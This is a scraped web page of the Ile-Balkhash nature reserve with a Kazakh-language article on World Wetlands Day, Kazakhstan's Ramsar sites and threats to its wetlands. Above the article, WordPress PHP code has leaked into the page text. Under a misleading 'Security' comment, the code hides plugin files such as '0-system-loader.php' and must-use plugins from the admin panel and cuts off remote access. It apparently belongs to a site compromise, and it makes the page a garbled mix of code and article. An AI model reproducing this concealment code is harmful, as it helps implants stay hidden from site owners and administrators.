// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); Бүкіл әлемде сулы-батпақты жерлер күні — Иле-Балхашский заповедник Бүкіл әлемде сулы-батпақты жерлер күні — Иле-Балхашский заповедник

Бүкіл әлемде сулы-батпақты жерлер күні

Жыл сайын 2 ақпанда  Бүкіл әлемде сулы-батпақты жерлер күні кеңінен атап өтіледі. 1971 жылғы 2 ақпанда Рамсар қаласында (Иран) халықаралық маңызы бар сулы-батпақты алқаптар туралы конвенцияға қол қойылды.

Қазақстан 2007 жылғы 2 мамырда Рамсар конвенциясына қосылды. Бүгінде бізде республикалық маңызы бар 44 сулы-батпақты жерлер мен халықаралық маңызы бар 10 сулы-батпақты объектілер  бар.

Бүгінгі күні Қазақстан Республикасының Рамсар жерінің жалпы аумағы 3 200 000 гектардан асады,  олардың ішіндегі ең ірісі — «Іле өзенінің атырауы және Балқаш көлінің оңтүстік жағалауы», шамамен 1 000 000 гектар жерді алып жатыр және Орталық Азия аумағында  сақталған жалғыз көл атырабы болып табылады, ал қалғандары (Сырдария, Амудария, Шу атыраулары) жаһандық шөлдену аясында іс жүзінде деградацияға ұшырады.

Климаттың өзгеруі және халық санының көбеюі жағдайында адамзат  су тапшылығының өткір проблемасына тап болды. 2018 жылдың 19 наурызында Бразилияда ұсынылған БҰҰ-ның су жағдайы туралы есебінде: «Егер шара қолданылмаса, 2050 жылға қарай 5 миллиардтан астам адам су проблемасына тап болады», — делінген.

Сондықтан бүгінгі күні республикамыздың сулы-батпақты алқаптарын орынды пайдалану және алдағы қауіп-қатерлерді жою қажет: техногендік ластану, ауылшаруашылық қажеттіліктері үшін реттелмеген суды алу, биологиялық ресурстарды бақылаусыз пайдалану, табиғи ағындардың өзгеруі және бөгеттер салу , сонымен қатар су ресурстарын ұтымды пайдаланудың трансшекаралық мәселелері.